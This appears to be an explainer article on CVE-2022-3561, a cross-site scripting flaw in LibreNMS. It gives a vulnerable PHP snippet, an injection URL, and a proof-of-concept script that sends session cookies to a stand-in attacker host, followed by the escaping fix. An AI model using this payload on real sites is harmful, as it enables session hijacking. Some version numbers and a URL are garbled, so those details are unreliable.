CVE-2022-3561 - Cross-site Scripting (XSS) Vulnerability in LibreNMS Explained

In October 2022, a critical security vulnerability was discovered in the popular network monitoring tool LibreNMS. If you are using LibreNMS version 22.10. or earlier, your system might be at risk due to CVE-2022-3561—a Cross-Site Scripting (XSS) vulnerability. This exclusive article will help you understand what the flaw is, how it works, and how you can protect your systems.

What is CVE-2022-3561?

CVE-2022-3561 is a _generic Cross-site Scripting (XSS)_ vulnerability found in the web interface of LibreNMS up to version 22.10.. XSS bugs allow attackers to inject malicious scripts into web pages viewed by other users. The root cause is improper filtering of user-supplied data rendered by the application.
Official advisory: NVD - CVE-2022-3561

Modifying displayed content

If your LibreNMS instance is accessible by others, especially over the internet or a large internal network, this vulnerability makes your users and infrastructure a potential target.

Vulnerable Code Area

Based on the information from the GitHub Advisory and LibreNMS's release notes, user-supplied input such as device names or custom SNMP attributes were not properly sanitized. Below is a simplified and anonymized example to illustrate the vulnerability:

<!-- Vulnerable code snippet -->
<td><?php echo $_GET['device']; ?></td>

If a user visits

https://example.com/device.php?device=<script>alert('XSS');</script>;

The <script> tag is injected directly into the HTML and executes in the victim’s browser.

`

https://librenms.example.com/device.php?device=

User Clicks the Link

When a legitimate user with an active LibreNMS session clicks on this link, the malicious JavaScript runs in their browser.

The Malicious Script Steals Their Cookie

The <script> in this case sends the user's session cookie to the attacker’s server, allowing the attacker to hijack the user’s session.

Here’s a simple, proof-of-concept attack

// Inserted by the attacker
<script>
  fetch('https://evil-domain.com/steal?cookie='+document.cookie);
</script>

Real Patch: How Did LibreNMS Fix It?

LibreNMS fixed this by escaping output using PHP’s htmlspecialchars function, which renders special characters like <, >, and " as harmless HTML entities:

<td><?php echo htmlspecialchars($_GET['device'], ENT_QUOTES, 'UTF-8'); ?></td>

Upgrade immediately to LibreNMS 22.10. or later.

Download the latest release here.

References and Further Reading

- Official NVD Entry
- GitHub Advisory
- LibreNMS Release Notes v22.10.
- OWASP XSS Prevention Cheat Sheet

Conclusion

CVE-2022-3561 is a serious XSS vulnerability in LibreNMS. If you manage IT infrastructure with LibreNMS, patch your systems as soon as possible and review your settings. Following best practices for input validation and output encoding can help secure your apps and your users.

Timeline

Published on: 11/20/2022 05:15:00 UTC
Last modified on: 11/21/2022 13:10:00 UTC